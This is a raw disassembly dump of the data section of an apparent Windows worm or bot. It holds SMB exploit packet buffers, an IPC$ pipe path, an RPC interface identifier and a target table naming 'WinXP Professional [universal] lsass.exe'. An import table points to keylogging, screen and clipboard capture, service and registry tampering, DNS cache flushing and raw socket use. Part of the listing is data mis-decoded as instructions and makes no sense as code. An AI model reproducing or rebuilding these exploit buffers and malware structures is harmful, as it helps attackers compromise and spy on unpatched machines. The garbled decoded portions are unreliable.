dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_431E70 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004158AC�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_5: ; DATA XREF: .text:004158EF�o
unicode 0, <C$>,0
a?????_0 db '?????',0
dd 2 dup(0)
dword_431ED8 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415BC1�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_431F48 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415BEC�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_431FF0 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415C20�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_432070 dd offset loc_401494+1 ; DATA XREF: .text:00415C50�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_432108 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415C82�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_432178 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415CA7�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_4321F0 dd 0 dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 0
dd offset loc_40A898+2
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfess_0 db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_4322B0 dd 1004600h ; .text:004159C7�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0
dd 9875h, 9873h
off_432338 dd offset sub_41721D ; DATA XREF: sub_41827B�r
dd offset nullsub_1
dd offset nullsub_1
align 10h
dword_432350 dd 19930520h, 3 dup(0) ; sub_417DC6+2�o
off_432360 dd offset sub_4183C4 ; DATA XREF: sub_4185EA+1C�r
dword_432364 dd 2 ; sub_41DA6E+E�r ...
off_432368 dd offset aNull_1 ; DATA XREF: sub_4189AC:loc_418D72�r
; sub_4189AC+4E4�r
; "(null)"
off_43236C dd offset aNull ; DATA XREF: sub_4189AC+2AC�r
; "(null)"
dword_432370 dd 0FFFFFFFFh ; sub_419141+16�w ...
align 10h
dd 43h, 0
dword_432388 dd 1, 8 dup(0) ; .text:off_4323DC�o
dd 2 dup(1), 3 dup(0)
dd offset off_432D64
align 10h
dd offset word_42C182
dd offset off_432CA8
dd 0
off_4323DC dd offset dword_432388 ; DATA XREF: sub_416C0A+A�r
; sub_417456+1C�r ...
dd 0
dd 1, 8 dup(0)
dd 43h, 21h dup(0)
dd 43h, 20h dup(0)
dd 10h
dword_432518 dd 0 ; sub_41A07D+8�o ...
dword_43251C dd 1 dd 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 22h dup(0)
off_432638 dd offset dword_481940 ; DATA XREF: sub_41A07D+2A�o
; sub_41A07D+4A�o ...
align 10h
dd offset dword_481940
dd 101h
dword_432648 dd 2 dup(0) dd 1000h, 0
dword_432658 dd 3 dup(0) ; sub_41C534+12�o
dd 2, 1, 3 dup(0)
dword_432678 dd 3 dup(0) ; sub_41C534:loc_41C552�o
dd 2 dup(2), 7 dup(0)
dword_4326A8 dd 7Ch dup(0) dword_432898 dd 8 dup(0) ; sub_41B0E4+D�o
dword_4328B8 dd 2 dup(0) dword_4328C0 dd 1 dword_4328C4 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_432A28 dd offset sub_42010E ; DATA XREF: sub_4171E5+5�w
; sub_4189AC+43E�r
off_432A2C dd offset sub_42010E ; DATA XREF: sub_4171E5+A�w
; sub_4189AC+46A�r
off_432A30 dd offset sub_42010E ; DATA XREF: sub_4171E5+14�w
; sub_419255+40D�r
off_432A34 dd offset sub_42010E ; DATA XREF: sub_4171E5+1E�w
; sub_4189AC+459�r
off_432A38 dd offset sub_42010E ; DATA XREF: sub_4171E5+28�w
off_432A3C dd offset sub_42010E ; DATA XREF: sub_4171E5+32�w
off_432A40 dd offset word_42C182 ; DATA XREF: sub_41756A:loc_41763C�r
; sub_4189AC:loc_418BAB�r ...
off_432A44 dd offset word_42C38A ; DATA XREF: sub_421C33+18�r
dword_432A48 dd 0BB40E64Eh ; sub_4189AC+9�r ...
dd offset loc_420637
off_432A50 dd offset sub_41CE51 ; DATA XREF: sub_41CE86+C�r
align 10h
byte_432A60 db 1 ; DATA XREF: sub_41D165+C8�r
db 2, 4, 8
align 8
dword_432A68 dd 3A4h dword_432A6C dd 82798260h dd 21h, 0
dword_432A78 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_432B58 dd 2 ; sub_41D8F7+32�r
off_432B5C dd offset aR6002FloatingP ; DATA XREF: sub_41D8F7+DE�r
; sub_41D8F7+11B�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 42C914h, 9, 42C8E8h, 0Ah, 42C850h, 10h, 42C824h
dd 11h, 42C7F4h, 12h, 42C7D0h, 13h, 42C7A4h, 18h, 42C76Ch
dd 19h, 42C744h, 1Ah, 42C70Ch, 1Bh, 42C6D4h, 1Ch, 42C6ACh
dd 78h, 42C69Ch, 79h, 42C68Ch, 7Ah, 42C67Ch, 0FCh, 4239F0h
dd 0FFh, 42C66Ch
dword_432BE8 dd 0C0000005h, 0Bh, 0 ; sub_4191D0+47�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_432C60 dd 3 ; sub_41DAA7+A3�r ...
dword_432C64 dd 7 ; sub_41DAA7+A9�r ...
dd 78h
dword_432C6C dd 0Ah ; sub_421355�r
dword_432C70 dd 0FFFFFFFFh, 0A80h, 7 dup(0) ; sub_41B136:loc_41B1BC�o
dword_432C94 dd 1 byte_432C98 db 2Eh ; DATA XREF: sub_419255:loc_419560�r
; sub_419255+329�r ...
align 4
dd 1, 432CA8h, 0
off_432CA8 dd offset aSun ; DATA XREF: .text:004323D4�o
; "Sun"
; ---------------------------------------------------------------------------
or al, 0CBh
inc edx
add [eax], cl
retf
; ---------------------------------------------------------------------------
dw 42h
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
; ---------------------------------------------------------------------------
cld
retf 42h
; ---------------------------------------------------------------------------
clc
retf 42h
; ---------------------------------------------------------------------------
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
; ---------------------------------------------------------------------------
aam 0CAh
inc edx
add al, cl
retf 42h
; ---------------------------------------------------------------------------
ror dl, 42h
add [edx+ecx*8-354FFFBEh], dh
inc edx
add [edx+ecx*8-3557FFBEh], ch
inc edx
add [edx+ecx*8-355FFFBEh], ah
inc edx
add [edx+ecx*8-3567FFBEh], bl
inc edx
add [edx+ecx*8-356FFFBEh], dl
inc edx
add [edx+ecx*8-3577FFBEh], cl
inc edx
add [edx+ecx*8-3583FFBEh], al
inc edx
add [eax-36h], dh
inc edx
add [eax-36h], ch
inc edx
add [eax-36h], ah
inc edx
add [eax+580042CAh], ah
retf 42h
; ---------------------------------------------------------------------------
push eax
retf 42h
; ---------------------------------------------------------------------------
dec eax
retf 42h
; ---------------------------------------------------------------------------
cmp al, 0CAh
inc edx
add [edx+ecx*8], dh
inc edx
add [eax], ch
retf 42h
; ---------------------------------------------------------------------------
sbb al, 0CAh
inc edx
add ds:35280042h[esi], ah
inc edx
add [eax], dl
retf 42h
; ---------------------------------------------------------------------------
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset aHhMmSs ; "HH:mm:ss"
dd 409h, 1, 0
dword_432D60 dd 2Eh off_432D64 dd offset dword_432D60 ; DATA XREF: sub_41EC2A+15�r
; .text:004323C0�o ...
off_432D68 dd offset dword_481440 ; DATA XREF: sub_41EC2A+32�r
off_432D6C dd offset dword_481440 ; DATA XREF: sub_41EC2A+4E�r
off_432D70 dd offset dword_481440 ; DATA XREF: sub_41EC89+1B�r
off_432D74 dd offset dword_481440 ; DATA XREF: sub_41EC89+38�r
off_432D78 dd offset dword_481440 ; DATA XREF: sub_41EC89+55�r
off_432D7C dd offset dword_481440 ; DATA XREF: sub_41EC89+72�r
off_432D80 dd offset dword_481440 ; DATA XREF: sub_41EC89+8F�r
off_432D84 dd offset dword_481440 ; DATA XREF: sub_41EC89+AC�r
off_432D88 dd offset dword_481440 ; DATA XREF: sub_41EC89+C8�r
dd 2 dup(7F7F7F7Fh)
off_432D94 dd offset off_432D64 ; DATA XREF: sub_41EC2A+B�r
; sub_41EC2A+27�r ...
align 10h
dd 1, 3 dup(0)
dword_432DB0 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFhdword_432DC8 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh, 7080h, 1, 0FFFFF1F0h
; DATA XREF: sub_41FECF�o
dd 0
dword_432DF0 dd 545350h, 0Fh dup(0)dword_432E30 dd 544450h, 0Fh dup(0) dd offset dword_432DF0
dd offset dword_432E30
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch, 2 dup(0)
dword_432F00 dd 2 dup(0) dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_433060 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_4217FB+26�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dword_4331C0 dd 0 ; sub_4017DA+CF�w ...
dword_4331C4 dd 0 ; sub_401B65+D7�w ...
dd 3E6h dup(0)
dword_434160 dd 6 dup(0) ; sub_401950+129�o ...
dword_434178 dd 0 ; sub_401141+347�o
dword_43417C dd 0A2h dup(0) dword_434404 dd 41h dup(0) dword_434508 dd 0 ; sub_401141+2F5�r
align 10h
dword_434510 dd 0 ; sub_401141+359�r
dword_434514 dd 0 dword_434518 dd 0 dword_43451C dd 0 dd 0
dword_434524 dd 0 dword_434528 dd 0 ; sub_401141+23B�o
dword_43452C dd 41h dup(0) dword_434630 dd 41h dup(0) dword_434734 dd 0 ; sub_401141+24D�r
dword_434738 dd 0 dword_43473C dd 0 ; sub_401141+208�r
dword_434740 dd 20h dup(0) ; sub_401141+1F3�o
dword_4347C0 dd 0 dword_4347C4 dd 0 ; sub_401141+1FD�w
dword_4347C8 dd 0 align 10h
dword_4347D0 dd 0 ; sub_401141+FF�o
dword_4347D4 dd 41h dup(0) dword_4348D8 dd 41h dup(0) dword_4349DC dd 0 ; sub_401141+111�r
dword_4349E0 dd 0 dword_4349E4 dd 0 ; sub_401141+CC�r
dword_4349E8 dd 20h dup(0) ; sub_401141+B7�o
dword_434A68 dd 0 dword_434A6C dd 0 ; sub_401141+C1�w
dword_434A70 dd 0 align 8
dword_434A78 dd 1F4h dup(0) ; sub_401F6D�o ...
db 0
byte_435249 db 3 dup(0) ; DATA XREF: .text:off_4276F0�o
dd 0E0Bh dup(0)
dword_438A78 dd 0 ; sub_401F6D+E�o ...
dword_438A7C dd 0Dh dup(0) dword_438AB0 dd 2 dup(0) dword_438AB8 dd 200h dup(0) ; sub_403B37+97�o ...
dword_4392B8 dd 0 ; resolved to->NTDLL.ZwQuerySystemInformation ; sub_403810+65�r ...
dword_4392BC dd 0 ; resolved to->NTDLL.RtlRunDecodeUnicodeString ; sub_403CEE+53�r ...
dword_4392C0 dd 200h dup(0) ; sub_403B37+AE�o ...
dword_439AC0 dd 0 ; resolved to->NTDLL.RtlCreateQueryDebugBuffer ; sub_403DEF+85�w
dword_439AC4 dd 0 ; resolved to->NTDLL.RtlQueryProcessDebugInformation ; sub_403DEF+92�w
dword_439AC8 dd 0 ; resolved to->NTDLL.RtlDestroyQueryDebugBuffer ; sub_403810+173�r ...
dword_439ACC dd 0 ; sub_403C5C+2F�r ...
dword_439AD0 dd 0 ; sub_403B37+FF�w
dword_439AD4 dd 0 ; sub_403B37+105�w ...
dword_439AD8 dd 0 ; sub_403C5C+49�r
align 10h
dword_439AE0 dd 80h dup(0) dword_439CE0 dd 80h dup(0) dword_439EE0 dd 0 ; sub_404151+51�r ...
dword_439EE4 dd 0 ; sub_404260+A0�r ...
byte_439EE8 db 0 ; DATA XREF: sub_40598C+11E�w
; sub_40598C+220�o
align 2
word_439EEA dw 0 ; DATA XREF: sub_40598C+12B�w
word_439EEC dw 0 ; DATA XREF: sub_40598C+136�w
word_439EEE dw 0 ; DATA XREF: sub_40598C+13F�w
byte_439EF0 db 0 ; DATA XREF: sub_40598C+145�w
byte_439EF1 db 0 ; DATA XREF: sub_40598C+14C�w
word_439EF2 dw 0 ; DATA XREF: sub_40598C+153�w
dword_439EF4 dd 0 ; sub_40598C+19B�w
dword_439EF8 dd 0 byte_439EFC db 0 ; DATA XREF: sub_40598C+1B2�w
byte_439EFD db 0 ; DATA XREF: sub_40598C+1C2�w
word_439EFE dw 0 ; DATA XREF: sub_40598C+1D5�w
word_439F00 dw 0 ; DATA XREF: sub_40598C+1E7�w
word_439F02 dw 0 ; DATA XREF: sub_40598C+1DD�w
dword_439F04 dd 100h dup(0) dword_43A304 dd 0 ; resolved to->WSOCK32.recv ; sub_403FEB+F8�r ...
dword_43A308 dd 0 ; resolved to->WS2_32.getsockname ; sub_4061D5+786�r ...
dword_43A30C dd 0 ; sub_4061D5+A08�r ...
dword_43A310 dd 0 ; resolved to->WININET.InternetCrackUrlA ; sub_4061D5+88E�r ...
dword_43A314 dd 0 ; resolved to->WS2_32.WSASocketA ; sub_4061D5+522�w ...
dword_43A318 dd 0 ; resolved to->WININET.InternetGetConnectedState ; sub_4061D5+84F�r ...
dword_43A31C dd 0 ; resolved to->KERNEL32.GetDriveTypeA ; sub_4061D5+8C�w ...
dword_43A320 dd 0 ; resolved to->USER32.CloseClipboard ; sub_4061D5+1E2�r ...
dword_43A324 dd 0 ; resolved to->USER32.IsWindow ; sub_4023C0+69�r ...
dword_43A328 dd 0 ; resolved to->WSOCK32.recvfrom ; sub_4061D5+756�r ...
dword_43A32C dd 0 ; resolved to->GDI32.SelectObject ; sub_4061D5+46F�w ...
dword_43A330 dd 0 ; sub_4141FB+A3�r
dword_43A334 dd 0 ; resolved to->WS2_32.ioctlsocket ; sub_405549+B1�r ...
dword_43A338 dd 0 ; resolved to->WININET.InternetOpenA ; sub_4061D5+855�r
dword_43A33C dd 0 ; resolved to->USER32.OpenClipboard ; sub_4061D5+1D2�r ...
dword_43A340 dd 0 ; resolved to->USER32.GetAsyncKeyState ; sub_4061D5+206�w ...
dword_43A344 dd 0 ; resolved to->KERNEL32.Process32Next ; sub_4061D5+CA�r ...
dword_43A348 dd 0 ; sub_4061D5+9F8�r ...
dword_43A34C dd 0 ; resolved to->WS2_32.connect ; sub_403FEB+8D�r ...
dword_43A350 dd 0 ; resolved to->USER32.GetWindowTextA ; sub_405ED4+77�r ...
dword_43A354 dd 0 ; sub_4061D5+C00�r
dword_43A358 dd 0 ; resolved to->ADVAPI32.RegQueryValueExA ; sub_4061D5+2D6�r
dword_43A35C dd 0 ; resolved to->WS2_32.accept ; sub_4061D5+640�w ...
dword_43A360 dd 0 ; resolved to->USER32.GetForegroundWindow ; sub_405ED4+62�r ...
dword_43A364 dd 0 dword_43A368 dd 0 ; sub_4061D5+A10�r ...
dword_43A36C dd 0 ; resolved to->WS2_32.sendto ; sub_40598C+228�r ...
dword_43A370 dd 0 ; resolved to->SHELL32.SHChangeNotifydword_43A374 dd 0 ; resolved to->KERNEL32.SetErrorMode ; sub_4061D5+AD�r ...
dword_43A378 dd 0 ; sub_4061D5+B30�r ...
dword_43A37C dd 0 ; sub_4061D5+A20�r ...
dword_43A380 dd 0 ; resolved to->ADVAPI32.RegSetValueExA ; sub_4061D5+298�w ...
dword_43A384 dd 0 ; sub_4061D5+9DB�r ...
dword_43A388 dd 0 ; sub_4061D5+A28�r ...
dword_43A38C dd 0 ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_4061D5+BA�r ...
dword_43A390 dd 0 ; resolved to->ADVAPI32.DeleteService ; sub_4061D5+3C1�r ...
dword_43A394 dd 0 ; resolved to->USER32.DestroyWindow ; sub_4025BC+24D�r ...
dword_43A398 dd 0 ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_4061D5+72�w ...
dword_43A39C dd 0 ; resolved to->WS2_32.socket ; sub_403FEB+45�r ...
dword_43A3A0 dd 0 ; sub_4061D5+9E8�r ...
dword_43A3A4 dd 0 ; resolved to->WININET.InternetOpenUrlA ; sub_4061D5+82E�w ...
dword_43A3A8 dd 0 ; resolved to->IPHLPAPI.GetIpNetTable ; sub_4061D5+AB7�r ...
dword_43A3AC dd 0 ; resolved to->WS2_32.WSAStartup ; sub_404FFA+16�r ...
dword_43A3B0 dd 0 ; sub_4081ED+72�r
dword_43A3B4 dd 0 ; resolved to->KERNEL32.Module32First ; sub_408D07+15C�r ...
dword_43A3B8 dd 0 ; resolved to->WSOCK32.setsockopt ; sub_40598C+76�r ...
dword_43A3BC dd 0 ; resolved to->KERNEL32.SearchPathA ; sub_4061D5+EA�r ...
dword_43A3C0 dd 0 ; sub_4061D5+C10�r
dword_43A3C4 dd 0 ; resolved to->WININET.HttpOpenRequestA ; sub_4061D5+86A�r ...
dword_43A3C8 dd 0 ; resolved to->GDI32.DeleteDC ; sub_402183+219�r ...
dword_43A3CC dd 0 ; resolved to->ADVAPI32.CloseServiceHandle ; sub_4061D5+3C9�r ...
dword_43A3D0 dd 0 ; sub_4025BC+2B�r ...
dword_43A3D4 dd 0 ; resolved to->WININET.InternetConnectA ; sub_4061D5+87A�r ...
dword_43A3D8 dd 0 ; sub_4061D5+A00�r ...
dword_43A3DC dd 0 ; resolved to->ADVAPI32.RegDeleteValueA ; sub_4061D5+2B2�w ...
dword_43A3E0 dd 0 ; resolved to->WS2_32.getpeername ; sub_4108F4+E3�r
dword_43A3E4 dd 0 ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_4061D5+F2�r
dword_43A3E8 dd 0 ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_4061D5+28B�w ...
dword_43A3EC dd 0 ; resolved to->KERNEL32.Process32First ; sub_4061D5+C2�r ...
dword_43A3F0 dd 0 ; resolved to->IPHLPAPI.IcmpCreateFile ; sub_4061D5+910�r ...
dword_43A3F4 dd 0 ; resolved to->WS2_32.__WSAFDIsSet ; sub_4061D5+53C�w ...
dword_43A3F8 dd 0 ; resolved to->USER32.FindWindowA ; sub_4061D5+1BA�r ...
dword_43A3FC dd 0 ; resolved to->WININET.InternetCloseHandle ; sub_4061D5+85B�w ...
dword_43A400 dd 0 ; resolved to->WS2_32.gethostbyname ; sub_4061D5+796�r ...
dword_43A404 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCacheEntry_Adword_43A408 dd 0 ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_408C9C+55�r
dword_43A40C dd 0 ; resolved to->IPHLPAPI.DeleteIpNetEntry ; sub_408774+98�r
dword_43A410 dd 0 ; resolved to->GDI32.GetDeviceCaps ; sub_402183+3D�r ...
dword_43A414 dd 0 ; resolved to->WS2_32.inet_addr ; sub_403FEB+25�r ...
dword_43A418 dd 0 ; resolved to->GDI32.CreateCompatibleDC ; sub_4061D5+448�w ...
dword_43A41C dd 0 ; resolved to->GDI32.DeleteObject ; sub_4061D5+496�w
dword_43A420 dd 0 ; resolved to->WS2_32.inet_ntoa ; sub_401950+77�r ...
dword_43A424 dd 0 ; resolved to->IPHLPAPI.IcmpCloseHandle ; sub_4061D5+91D�r ...
dword_43A428 dd 0 ; resolved to->GDI32.BitBlt ; sub_4061D5+47C�w ...
dword_43A42C dd 0 ; resolved to->WS2_32.WSAAsyncSelect ; sub_4061D5+6B2�r ...
dword_43A430 dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_412AEE+ED�r
dword_43A434 dd 0 ; sub_409806+3B23�r
dword_43A438 dd 0 ; resolved to->WS2_32.send ; sub_403FEB+E2�r ...
dword_43A43C dd 0 ; resolved to->USER32.ExitWindowsEx ; sub_407512+15�r
dword_43A440 dd 0 ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_403440+2B�r ...
dword_43A444 dd 0 ; sub_4061D5+B1B�r ...
dword_43A448 dd 0 ; resolved to->WS2_32.select ; sub_405549+3C4�r ...
dword_43A44C dd 0 ; resolved to->KERNEL32.QueryPerformanceFrequencydword_43A450 dd 0 ; resolved to->WININET.InternetReadFile ; sub_4061D5+848�w ...
dword_43A454 dd 0 ; sub_4061D5+C18�r
dword_43A458 dd 0 ; resolved to->GDI32.GetDIBColorTable ; sub_4061D5+462�w ...
dword_43A45C dd 0 ; resolved to->WS2_32.WSAGetLastError ; sub_404EFB+A1�r ...
dword_43A460 dd 0 ; resolved to->ADVAPI32.OpenSCManagerA ; sub_4061D5+39C�r ...
dword_43A464 dd 0 ; resolved to->USER32.SendMessageA ; sub_4023C0+7F�r ...
dword_43A468 dd 0 ; resolved to->ADVAPI32.StartServiceA ; sub_4061D5+3B1�r ...
dword_43A46C dd 0 ; sub_4061D5+A18�r ...
dword_43A470 dd 0 ; resolved to->ADVAPI32.EnumServicesStatusA ; sub_4061D5+3D1�r ...
dword_43A474 dd 0 ; resolved to->WS2_32.ntohl ; sub_4061D5+5D8�w ...
dword_43A478 dd 0 ; resolved to->WS2_32.WSAIoctl ; sub_4061D5+6BE�r ...
dword_43A47C dd 0 ; resolved to->WS2_32.bind ; sub_4061D5+619�w ...
dword_43A480 dd 0 ; resolved to->ADVAPI32.RegCloseKey ; sub_4061D5+2BF�w ...
dword_43A484 dd 0 ; resolved to->ADVAPI32.ControlService ; sub_4061D5+3B9�r ...
dword_43A488 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCache ; sub_4061D5+A6D�r ...
